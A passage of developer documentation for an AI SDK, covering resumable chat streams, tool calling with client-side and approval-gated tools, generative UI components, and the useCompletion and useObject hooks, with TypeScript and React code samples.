3. Implement the GET handler

Create a GET handler at /api/chat/[id]/stream that:

Reads the chat ID from the route params
Loads the chat data to check for an active stream
Returns 204 (No Content) if no stream is active
Resumes the existing stream if one is found

import { readChat } from '@util/chat-store';
import { UI_MESSAGE_STREAM_HEADERS } from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';

export async function GET(
  _: Request,
  { params }: { params: Promise<{ id: string }> },
) {
  const { id } = await params;

  const chat = await readChat(id);

  if (chat.activeStreamId == null) {
    // no content response when there is no active stream
    return new Response(null, { status: 204 });
  }

  const streamContext = createResumableStreamContext({
    waitUntil: after,
  });

  return new Response(
    await streamContext.resumeExistingStream(chat.activeStreamId),
    { headers: UI_MESSAGE_STREAM_HEADERS },
  );
}

How it works

Request lifecycle

Diagram showing the architecture and lifecycle of resumable stream requests

The diagram above shows the complete lifecycle of a resumable stream:

Stream creation: When you send a new message, the POST handler uses streamText to generate the response. The consumeSseStream callback creates a resumable stream with a unique ID and stores it in Redis through the resumable-stream package
Stream tracking: Your persistence layer saves the activeStreamId in the chat data
Client reconnection: When the client reconnects (page reload), the resume option triggers a GET request to /api/chat/[id]/stream
Stream recovery: The GET handler checks for an activeStreamId and uses resumeExistingStream to reconnect. If no active stream exists, it returns a 204 (No Content) response
Completion cleanup: When the stream finishes, the onFinish callback clears the activeStreamId by setting it to null

Customize the resume endpoint

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

export function Chat({ chatData, resume }) {
  const { messages, sendMessage } = useChat({
    id: chatData.id,
    messages: chatData.messages,
    resume,
    transport: new DefaultChatTransport({
      // Customize reconnect settings (optional)
      prepareReconnectToStreamRequest: ({ id }) => {
        return {
          api: `/api/chat/${id}/stream`, // Default pattern
          // Or use a different pattern:
          // api: `/api/streams/${id}/resume`,
          // api: `/api/resume-chat?id=${id}`,
          credentials: 'include', // Include cookies/auth
          headers: {
            Authorization: 'Bearer token',
            'X-Custom-Header': 'value',
          },
        };
      },
    }),
  });

  return <div>{/* Your chat UI */}</div>;
}

This lets you:

Match your existing API route structure
Add query parameters or custom paths
Integrate with different backend architectures

Important considerations

Incompatibility with abort: Stream resumption is not compatible with abort functionality. Closing a tab or refreshing the page triggers an abort signal that will break the resumption mechanism. Do not use resume: true if you need abort functionality in your application
Stream expiration: Streams in Redis expire after a set time (configurable in the resumable-stream package)
Multiple clients: Multiple clients can connect to the same stream simultaneously
Error handling: When no active stream exists, the GET handler returns a 204 (No Content) status code
Security: Ensure proper authentication and authorization for both creating and resuming streams
Race conditions: Clear the activeStreamId when starting a new stream to prevent resuming outdated streams

title: Chatbot Tool Usage description: Learn how to use tools with the useChat hook.

Chatbot Tool Usage

With useChat and streamText, you can use tools in your chatbot application. The AI SDK supports three types of tools in this context:

Automatically executed server-side tools
Automatically executed client-side tools
Tools that require user interaction, such as confirmation dialogs

The flow is as follows:

The user enters a message in the chat UI.
The message is sent to the API route.
In your server side route, the language model generates tool calls during the streamText call.
All tool calls are forwarded to the client.
Server-side tools are executed using their execute method and their results are forwarded to the client.
Client-side tools that should be automatically executed are handled with the onToolCall callback. You must call addToolOutput to provide the tool result.
Client-side tool that require user interactions can be displayed in the UI. The tool calls and results are available as tool invocation parts in the parts property of the last assistant message.
When the user interaction is done, addToolOutput can be used to add the tool result to the chat.
The chat can be configured to automatically submit when all tool results are available using sendAutomaticallyWhen. This triggers another iteration of this flow.

Example

In this example, we'll use three tools:

getWeatherInformation: An automatically executed server-side tool that returns the weather in a given city.
askForConfirmation: A user-interaction client-side tool that asks the user for confirmation.
getLocation: An automatically executed client-side tool that returns a random city.

API route

import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
    tools: {
      // server-side tool with execute function:
      getWeatherInformation: {
        description: 'show the weather in a given city to the user',
        inputSchema: z.object({ city: z.string() }),
        execute: async ({}: { city: string }) => {
          const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
          return weatherOptions[
            Math.floor(Math.random() * weatherOptions.length)
          ];
        },
      },
      // client-side tool that starts user interaction:
      askForConfirmation: {
        description: 'Ask the user for confirmation.',
        inputSchema: z.object({
          message: z.string().describe('The message to ask for confirmation.'),
        }),
      },
      // client-side tool that is automatically executed on the client:
      getLocation: {
        description:
          'Get the user location. Always ask for confirmation before using this tool.',
        inputSchema: z.object({}),
      },
    },
  });

  return result.toUIMessageStreamResponse();
}

Client-side page

There are three things worth mentioning:

The onToolCall callback is used to handle client-side tools that should be automatically executed. In this example, the getLocation tool is a client-side tool that returns a random city. You call addToolOutput to provide the result (without await to avoid potential deadlocks).
The sendAutomaticallyWhen option with lastAssistantMessageIsCompleteWithToolCalls helper automatically submits when all tool results are available.
The parts array of assistant messages contains tool parts with typed names like tool-askForConfirmation. The client-side tool askForConfirmation is displayed in the UI. It asks the user for confirmation and displays the result once the user confirms or denies the execution. The result is added to the chat using addToolOutput with the tool parameter for type safety.

'use client';

import { useChat } from '@ai-sdk/react';
import {
  DefaultChatTransport,
  lastAssistantMessageIsCompleteWithToolCalls,
} from 'ai';
import { useState } from 'react';

export default function Chat() {
  const { messages, sendMessage, addToolOutput } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),

    sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithToolCalls,

    // run client-side tools that are automatically executed:
    async onToolCall({ toolCall }) {
      // Check if it's a dynamic tool first for proper type narrowing
      if (toolCall.dynamic) {
        return;
      }

      if (toolCall.toolName === 'getLocation') {
        const cities = ['New York', 'Los Angeles', 'Chicago', 'San Francisco'];

        // No await - avoids potential deadlocks
        addToolOutput({
          tool: 'getLocation',
          toolCallId: toolCall.toolCallId,
          output: cities[Math.floor(Math.random() * cities.length)],
        });
      }
    },
  });
  const [input, setInput] = useState('');

  return (
    <>
      {messages?.map(message => (
        <div key={message.id}>
          <strong>{`${message.role}: `}</strong>
          {message.parts.map(part => {
            switch (part.type) {
              // render text parts as simple text:
              case 'text':
                return part.text;

              // for tool parts, use the typed tool part names:
              case 'tool-askForConfirmation': {
                const callId = part.toolCallId;

                switch (part.state) {
                  case 'input-streaming':
                    return (
                      <div key={callId}>Loading confirmation request...</div>
                    );
                  case 'input-available':
                    return (
                      <div key={callId}>
                        {part.input.message}
                        <div>
                          <button
                            onClick={() =>
                              addToolOutput({
                                tool: 'askForConfirmation',
                                toolCallId: callId,
                                output: 'Yes, confirmed.',
                              })
                            }
                          >
                            Yes
                          </button>
                          <button
                            onClick={() =>
                              addToolOutput({
                                tool: 'askForConfirmation',
                                toolCallId: callId,
                                output: 'No, denied',
                              })
                            }
                          >
                            No
                          </button>
                        </div>
                      </div>
                    );
                  case 'output-available':
                    return (
                      <div key={callId}>
                        Location access allowed: {part.output}
                      </div>
                    );
                  case 'output-error':
                    return <div key={callId}>Error: {part.errorText}</div>;
                }
                break;
              }

              case 'tool-getLocation': {
                const callId = part.toolCallId;

                switch (part.state) {
                  case 'input-streaming':
                    return (
                      <div key={callId}>Preparing location request...</div>
                    );
                  case 'input-available':
                    return <div key={callId}>Getting location...</div>;
                  case 'output-available':
                    return <div key={callId}>Location: {part.output}</div>;
                  case 'output-error':
                    return (
                      <div key={callId}>
                        Error getting location: {part.errorText}
                      </div>
                    );
                }
                break;
              }

              case 'tool-getWeatherInformation': {
                const callId = part.toolCallId;

                switch (part.state) {
                  // example of pre-rendering streaming tool inputs:
                  case 'input-streaming':
                    return (
                      <pre key={callId}>{JSON.stringify(part, null, 2)}</pre>
                    );
                  case 'input-available':
                    return (
                      <div key={callId}>
                        Getting weather information for {part.input.city}...
                      </div>
                    );
                  case 'output-available':
                    return (
                      <div key={callId}>
                        Weather in {part.input.city}: {part.output}
                      </div>
                    );
                  case 'output-error':
                    return (
                      <div key={callId}>
                        Error getting weather for {part.input.city}:{' '}
                        {part.errorText}
                      </div>
                    );
                }
                break;
              }
            }
          })}
          <br />
        </div>
      ))}

      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input value={input} onChange={e => setInput(e.target.value)} />
      </form>
    </>
  );
}

Error handling

Sometimes an error may occur during client-side tool execution. Use the addToolOutput method with a state of output-error and errorText value instead of output record the error.

'use client';

import { useChat } from '@ai-sdk/react';
import {
  DefaultChatTransport,
  lastAssistantMessageIsCompleteWithToolCalls,
} from 'ai';
import { useState } from 'react';

export default function Chat() {
  const { messages, sendMessage, addToolOutput } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),

    sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithToolCalls,

    // run client-side tools that are automatically executed:
    async onToolCall({ toolCall }) {
      // Check if it's a dynamic tool first for proper type narrowing
      if (toolCall.dynamic) {
        return;
      }

      if (toolCall.toolName === 'getWeatherInformation') {
        try {
          const weather = await getWeatherInformation(toolCall.input);

          // No await - avoids potential deadlocks
          addToolOutput({
            tool: 'getWeatherInformation',
            toolCallId: toolCall.toolCallId,
            output: weather,
          });
        } catch (err) {
          addToolOutput({
            tool: 'getWeatherInformation',
            toolCallId: toolCall.toolCallId,
            state: 'output-error',
            errorText: 'Unable to get the weather information',
          });
        }
      }
    },
  });
}

Tool Execution Approval

Tool execution approval lets you require user confirmation before a server-side tool runs. Unlike client-side tools that execute in the browser, tools with approval still execute on the server—but only after the user approves.

Use tool execution approval when you want to:

Confirm sensitive operations (payments, deletions, external API calls)
Let users review tool inputs before execution
Add human oversight to automated workflows

For tools that need to run in the browser (updating UI state, accessing browser APIs), use client-side tools instead.

Server Setup

Enable approval by setting needsApproval on your tool. See Tool Execution Approval for configuration options including dynamic approval based on input.

import { streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages,
    tools: {
      getWeather: tool({
        description: 'Get the weather in a location',
        inputSchema: z.object({
          city: z.string(),
        }),
        needsApproval: true,
        execute: async ({ city }) => {
          const weather = await fetchWeather(city);
          return weather;
        },
      }),
    },
  });

  return result.toUIMessageStreamResponse();
}

Client-Side Approval UI

When a tool requires approval, the tool part state is approval-requested. Use addToolApprovalResponse to approve or deny:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Chat() {
  const { messages, addToolApprovalResponse } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.parts.map(part => {
            if (part.type === 'tool-getWeather') {
              switch (part.state) {
                case 'approval-requested':
                  return (
                    <div key={part.toolCallId}>
                      <p>Get weather for {part.input.city}?</p>
                      <button
                        onClick={() =>
                          addToolApprovalResponse({
                            id: part.approval.id,
                            approved: true,
                          })
                        }
                      >
                        Approve
                      </button>
                      <button
                        onClick={() =>
                          addToolApprovalResponse({
                            id: part.approval.id,
                            approved: false,
                          })
                        }
                      >
                        Deny
                      </button>
                    </div>
                  );
                case 'output-available':
                  return (
                    <div key={part.toolCallId}>
                      Weather in {part.input.city}: {part.output}
                    </div>
                  );
              }
            }
            // Handle other part types...
          })}
        </div>
      ))}
    </>
  );
}

Auto-Submit After Approval

Use lastAssistantMessageIsCompleteWithApprovalResponses to automatically continue the conversation after approvals:

import { useChat } from '@ai-sdk/react';
import { lastAssistantMessageIsCompleteWithApprovalResponses } from 'ai';

const { messages, addToolApprovalResponse } = useChat({
  sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithApprovalResponses,
});

Dynamic Tools

When using dynamic tools (tools with unknown types at compile time), the UI parts use a generic dynamic-tool type instead of specific tool types:

{
  message.parts.map((part, index) => {
    switch (part.type) {
      // Static tools with specific (`tool-${toolName}`) types
      case 'tool-getWeatherInformation':
        return <WeatherDisplay part={part} />;

      // Dynamic tools use generic `dynamic-tool` type
      case 'dynamic-tool':
        return (
          <div key={index}>
            <h4>Tool: {part.toolName}</h4>
            {part.state === 'input-streaming' && (
              <pre>{JSON.stringify(part.input, null, 2)}</pre>
            )}
            {part.state === 'output-available' && (
              <pre>{JSON.stringify(part.output, null, 2)}</pre>
            )}
            {part.state === 'output-error' && (
              <div>Error: {part.errorText}</div>
            )}
          </div>
        );
    }
  });
}

Dynamic tools are useful when integrating with:

MCP (Model Context Protocol) tools without schemas
User-defined functions loaded at runtime
External tool providers

Tool call streaming

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
    // toolCallStreaming is enabled by default in v5
    // ...
  });

  return result.toUIMessageStreamResponse();
}

export default function Chat() {
  // ...
  return (
    <>
      {messages?.map(message => (
        <div key={message.id}>
          {message.parts.map(part => {
            switch (part.type) {
              case 'tool-askForConfirmation':
              case 'tool-getLocation':
              case 'tool-getWeatherInformation':
                switch (part.state) {
                  case 'input-streaming':
                    return <pre>{JSON.stringify(part.input, null, 2)}</pre>;
                  case 'input-available':
                    return <pre>{JSON.stringify(part.input, null, 2)}</pre>;
                  case 'output-available':
                    return <pre>{JSON.stringify(part.output, null, 2)}</pre>;
                  case 'output-error':
                    return <div>Error: {part.errorText}</div>;
                }
            }
          })}
        </div>
      ))}
    </>
  );
}

Step start parts

// ...
// where you render the message parts:
message.parts.map((part, index) => {
  switch (part.type) {
    case 'step-start':
      // show step boundaries as horizontal lines:
      return index > 0 ? (
        <div key={index} className="text-gray-500">
          <hr className="my-2 border-gray-300" />
        </div>
      ) : null;
    case 'text':
    // ...
    case 'tool-askForConfirmation':
    case 'tool-getLocation':
    case 'tool-getWeatherInformation':
    // ...
  }
});
// ...

Server-side Multi-Step Calls

You can also use multi-step calls on the server-side with streamText. This works when all invoked tools have an execute function on the server side.

import { convertToModelMessages, streamText, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
    tools: {
      getWeatherInformation: {
        description: 'show the weather in a given city to the user',
        inputSchema: z.object({ city: z.string() }),
        // tool has execute function:
        execute: async ({}: { city: string }) => {
          const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
          return weatherOptions[
            Math.floor(Math.random() * weatherOptions.length)
          ];
        },
      },
    },
    stopWhen: stepCountIs(5),
  });

  return result.toUIMessageStreamResponse();
}

Errors

Language models can make errors when calling tools. By default, these errors are masked for security reasons, and show up as "An error occurred" in the UI.

To surface the errors, you can use the onError function when calling toUIMessageResponse.

export function errorHandler(error: unknown) {
  if (error == null) {
    return 'unknown error';
  }

  if (typeof error === 'string') {
    return error;
  }

  if (error instanceof Error) {
    return error.message;
  }

  return JSON.stringify(error);
}

const result = streamText({
  // ...
});

return result.toUIMessageStreamResponse({
  onError: errorHandler,
});

In case you are using createUIMessageResponse, you can use the onError function when calling toUIMessageResponse:

const response = createUIMessageResponse({
  // ...
  async execute(dataStream) {
    // ...
  },
  onError: error => `Custom error: ${error.message}`,
});

title: Generative User Interfaces description: Learn how to build Generative UI with AI SDK UI.

Generative User Interfaces

Generative UI is the process of connecting the results of a tool call to a React component. Here's how it works:

You provide the model with a prompt or conversation history, along with a set of tools.
Based on the context, the model may decide to call a tool.
If a tool is called, it will execute and return data.
This data can then be passed to a React component for rendering.

By passing the tool results to React components, you can create a generative UI experience that's more engaging and adaptive to your needs.

Build a Generative UI Chat Interface

Let's create a chat interface that handles text-based conversations and incorporates dynamic UI elements based on model responses.

Basic Chat Implementation

Start with a basic chat implementation using the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
          <div>
            {message.parts.map((part, index) => {
              if (part.type === 'text') {
                return <span key={index}>{part.text}</span>;
              }
              return null;
            })}
          </div>
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          placeholder="Type a message..."
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

To handle the chat requests and model responses, set up an API route:

import { streamText, convertToModelMessages, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;

export async function POST(request: Request) {
  const { messages }: { messages: UIMessage[] } = await request.json();

  const result = streamText({
    model: __MODEL__,
    system: 'You are a friendly assistant!',
    messages: await convertToModelMessages(messages),
    stopWhen: stepCountIs(5),
  });

  return result.toUIMessageStreamResponse();
}

This API route uses the streamText function to process chat messages and stream the model's responses back to the client.

Create a Tool

Create a new file called ai/tools.ts with the following content:

import { tool as createTool } from 'ai';
import { z } from 'zod';

export const weatherTool = createTool({
  description: 'Display the weather for a location',
  inputSchema: z.object({
    location: z.string().describe('The location to get the weather for'),
  }),
  execute: async function ({ location }) {
    await new Promise(resolve => setTimeout(resolve, 2000));
    return { weather: 'Sunny', temperature: 75, location };
  },
});

export const tools = {
  displayWeather: weatherTool,
};

Update the API Route

Update the API route to include the tool you've defined:

import { streamText, convertToModelMessages, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { tools } from '@/ai/tools';

export async function POST(request: Request) {
  const { messages }: { messages: UIMessage[] } = await request.json();

  const result = streamText({
    model: __MODEL__,
    system: 'You are a friendly assistant!',
    messages: await convertToModelMessages(messages),
    stopWhen: stepCountIs(5),
    tools,
  });

  return result.toUIMessageStreamResponse();
}

Now that you've defined the tool and added it to your streamText call, let's build a React component to display the weather information it returns.

Create UI Components

Create a new file called components/weather.tsx:

type WeatherProps = {
  temperature: number;
  weather: string;
  location: string;
};

export const Weather = ({ temperature, weather, location }: WeatherProps) => {
  return (
    <div>
      <h2>Current Weather for {location}</h2>
      <p>Condition: {weather}</p>
      <p>Temperature: {temperature}°C</p>
    </div>
  );
};

This component will display the weather information for a given location. It takes three props: temperature, weather, and location (exactly what the weatherTool returns).

Render the Weather Component

Now that you have your tool and corresponding React component, let's integrate them into your chat interface. You'll render the Weather component when the model calls the weather tool.

Update your page.tsx file:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Weather } from '@/components/weather';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
          <div>
            {message.parts.map((part, index) => {
              if (part.type === 'text') {
                return <span key={index}>{part.text}</span>;
              }

              if (part.type === 'tool-displayWeather') {
                switch (part.state) {
                  case 'input-available':
                    return <div key={index}>Loading weather...</div>;
                  case 'output-available':
                    return (
                      <div key={index}>
                        <Weather {...part.output} />
                      </div>
                    );
                  case 'output-error':
                    return <div key={index}>Error: {part.errorText}</div>;
                  default:
                    return null;
                }
              }

              return null;
            })}
          </div>
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          placeholder="Type a message..."
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

In this updated code snippet, you:

Use manual input state management with useState instead of the built-in input and handleInputChange.
Use sendMessage instead of handleSubmit to send messages.
Check the parts array of each message for different content types.
Handle tool parts with type tool-displayWeather and their different states (input-available, output-available, output-error).

This approach allows you to dynamically render UI components based on the model's responses, creating a more interactive and context-aware chat experience.

Expanding Your Generative UI Application

You can enhance your chat application by adding more tools and components, creating a richer and more versatile user experience. Here's how you can expand your application:

Adding More Tools

To add more tools, simply define them in your ai/tools.ts file:

// Add a new stock tool
export const stockTool = createTool({
  description: 'Get price for a stock',
  inputSchema: z.object({
    symbol: z.string().describe('The stock symbol to get the price for'),
  }),
  execute: async function ({ symbol }) {
    // Simulated API call
    await new Promise(resolve => setTimeout(resolve, 2000));
    return { symbol, price: 100 };
  },
});

// Update the tools object
export const tools = {
  displayWeather: weatherTool,
  getStockPrice: stockTool,
};

Now, create a new file called components/stock.tsx:

type StockProps = {
  price: number;
  symbol: string;
};

export const Stock = ({ price, symbol }: StockProps) => {
  return (
    <div>
      <h2>Stock Information</h2>
      <p>Symbol: {symbol}</p>
      <p>Price: ${price}</p>
    </div>
  );
};

Finally, update your page.tsx file to include the new Stock component:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Weather } from '@/components/weather';
import { Stock } from '@/components/stock';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>{message.role}</div>
          <div>
            {message.parts.map((part, index) => {
              if (part.type === 'text') {
                return <span key={index}>{part.text}</span>;
              }

              if (part.type === 'tool-displayWeather') {
                switch (part.state) {
                  case 'input-available':
                    return <div key={index}>Loading weather...</div>;
                  case 'output-available':
                    return (
                      <div key={index}>
                        <Weather {...part.output} />
                      </div>
                    );
                  case 'output-error':
                    return <div key={index}>Error: {part.errorText}</div>;
                  default:
                    return null;
                }
              }

              if (part.type === 'tool-getStockPrice') {
                switch (part.state) {
                  case 'input-available':
                    return <div key={index}>Loading stock price...</div>;
                  case 'output-available':
                    return (
                      <div key={index}>
                        <Stock {...part.output} />
                      </div>
                    );
                  case 'output-error':
                    return <div key={index}>Error: {part.errorText}</div>;
                  default:
                    return null;
                }
              }

              return null;
            })}
          </div>
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          type="text"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

By following this pattern, you can continue to add more tools and components, expanding the capabilities of your Generative UI application.

title: Completion description: Learn how to use the useCompletion hook.

Completion

In this guide, you will learn how to use the useCompletion hook in your application to generate text completions and stream them in real-time to your users.

Example

'use client';

import { useCompletion } from '@ai-sdk/react';

export default function Page() {
  const { completion, input, handleInputChange, handleSubmit } = useCompletion({
    api: '/api/completion',
  });

  return (
    <form onSubmit={handleSubmit}>
      <input
        name="prompt"
        value={input}
        onChange={handleInputChange}
        id="input"
      />
      <button type="submit">Submit</button>
      <div>{completion}</div>
    </form>
  );
}

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { prompt }: { prompt: string } = await req.json();

  const result = streamText({
    model: __MODEL__,
    prompt,
  });

  return result.toUIMessageStreamResponse();
}

This enables a seamless text completion experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.

Customized UI

useCompletion also provides ways to manage the prompt via code, show loading and error states, and update messages without being triggered by user interactions.

Loading and error states

To show a loading spinner while the chatbot is processing the user's message, you can use the isLoading state returned by the useCompletion hook:

const { isLoading, ... } = useCompletion()

return(
  <>
    {isLoading ? <Spinner /> : null}
  </>
)

Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or show a toast notification:

const { error, ... } = useCompletion()

useEffect(() => {
  if (error) {
    toast.error(error.message)
  }
}, [error])

// Or display the error message in the UI:
return (
  <>
    {error ? <div>{error.message}</div> : null}
  </>
)

Controlled input

The following example demonstrates how to use more granular APIs like setInput with your custom input and submit button components:

const { input, setInput } = useCompletion();

return (
  <>
    <MyCustomInput value={input} onChange={value => setInput(value)} />
  </>
);

Cancelation

It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useCompletion hook.

const { stop, isLoading, ... } = useCompletion()

return (
  <>
    <button onClick={stop} disabled={!isLoading}>Stop</button>
  </>
)

When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your application.

Throttling UI Updates

This feature is currently only available for React.

By default, the useCompletion hook will trigger a render every time a new chunk is received. You can throttle the UI updates with the experimental_throttle option.

const { completion, ... } = useCompletion({
  // Throttle the completion and data updates to 50ms:
  experimental_throttle: 50
})

Event Callbacks

const { ... } = useCompletion({
  onFinish: (prompt: string, completion: string) => {
    console.log('Finished streaming completion:', completion)
  },
  onError: (error: Error) => {
    console.error('An error occurred:', error)
  },
})

Configure Request Options

const { messages, input, handleInputChange, handleSubmit } = useCompletion({
  api: '/api/custom-completion',
  headers: {
    Authorization: 'your_token',
  },
  body: {
    user_id: '123',
  },
  credentials: 'same-origin',
});

title: Object Generation description: Learn how to use the useObject hook.

Object Generation

The useObject hook allows you to create interfaces that represent a structured JSON object that is being streamed.

In this guide, you will learn how to use the useObject hook in your application to generate UIs for structured data on the fly.

Example

The example shows a small notifications demo app that generates fake notifications in real-time.

Schema

It is helpful to set up the schema in a separate file that is imported on both the client and server.

import { z } from 'zod';

// define a schema for the notifications
export const notificationSchema = z.object({
  notifications: z.array(
    z.object({
      name: z.string().describe('Name of a fictional person.'),
      message: z.string().describe('Message. Do not use emojis or links.'),
    }),
  ),
});

Client

The client uses useObject to stream the object generation process.

The results are partial and are displayed as they are received. Please note the code for handling undefined values in the JSX.

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';

export default function Page() {
  const { object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Server

On the server, we use streamText with Output.object() to stream the object generation process.

import { streamText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { notificationSchema } from './schema';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const context = await req.json();

  const result = streamText({
    model: __MODEL__,
    output: Output.object({ schema: notificationSchema }),
    prompt:
      `Generate 3 notifications for a messages app in this context:` + context,
  });

  return result.toTextStreamResponse();
}

Enum Output Mode

Example: Text Classification

This example shows how to build a simple text classifier that categorizes statements as true or false.

Client

When using useObject with enum output mode, your schema must be an object with enum as the key:

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';
import { z } from 'zod';

export default function ClassifyPage() {
  const { object, submit, isLoading } = useObject({
    api: '/api/classify',
    schema: z.object({ enum: z.enum(['true', 'false']) }),
  });

  return (
    <>
      <button onClick={() => submit('The earth is flat')} disabled={isLoading}>
        Classify statement
      </button>

      {object && <div>Classification: {object.enum}</div>}
    </>
  );
}

Server

On the server, use streamText with Output.choice() to stream the classification result:

import { streamText, Output } from 'ai';
__PROVIDER_IMPORT__;

export async function POST(req: Request) {
  const context = await req.json();

  const result = streamText({
    model: __MODEL__,
    output: Output.choice({ options: ['true', 'false'] }),
    prompt: `Classify this statement as true or false: ${context}`,
  });

  return result.toTextStreamResponse();
}

Customized UI

useObject also provides ways to show loading and error states:

Loading State

The isLoading state returned by the useObject hook can be used for several purposes:

To show a loading spinner while the object is generated.
To disable the submit button.

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';

export default function Page() {
  const { isLoading, object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      {isLoading && <Spinner />}

      <button
        onClick={() => submit('Messages during finals week.')}
        disabled={isLoading}
      >
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Stop Handler

The stop function can be used to stop the object generation process. This can be useful if the user wants to cancel the request or if the server is taking too long to respond.

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';

export default function Page() {
  const { isLoading, stop, object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      {isLoading && (
        <button type="button" onClick={() => stop()}>
          Stop
        </button>
      )}

      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Error State

Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or to disable the submit button:

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';

export default function Page() {
  const { error, object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      {error && <div>An error occurred.</div>}

      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Event Callbacks

useObject provides optional event callbacks that you can use to handle life-cycle events.

onFinish: Called when the object generation is completed.
onError: Called when an error occurs during the fetch request.

These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';

export default function Page() {
  const { object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
    onFinish({ object, error }) {
      // typed object, undefined if schema validation fails:
      console.log('Object generation completed:', object);

      // error, undefined if schema validation succeeds:
      console.log('Schema validation error:', error);
    },
    onError(error) {
      // error during fetch request:
      console.error('An error occurred:', error);
    },
  });

  return (
    <div>
      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
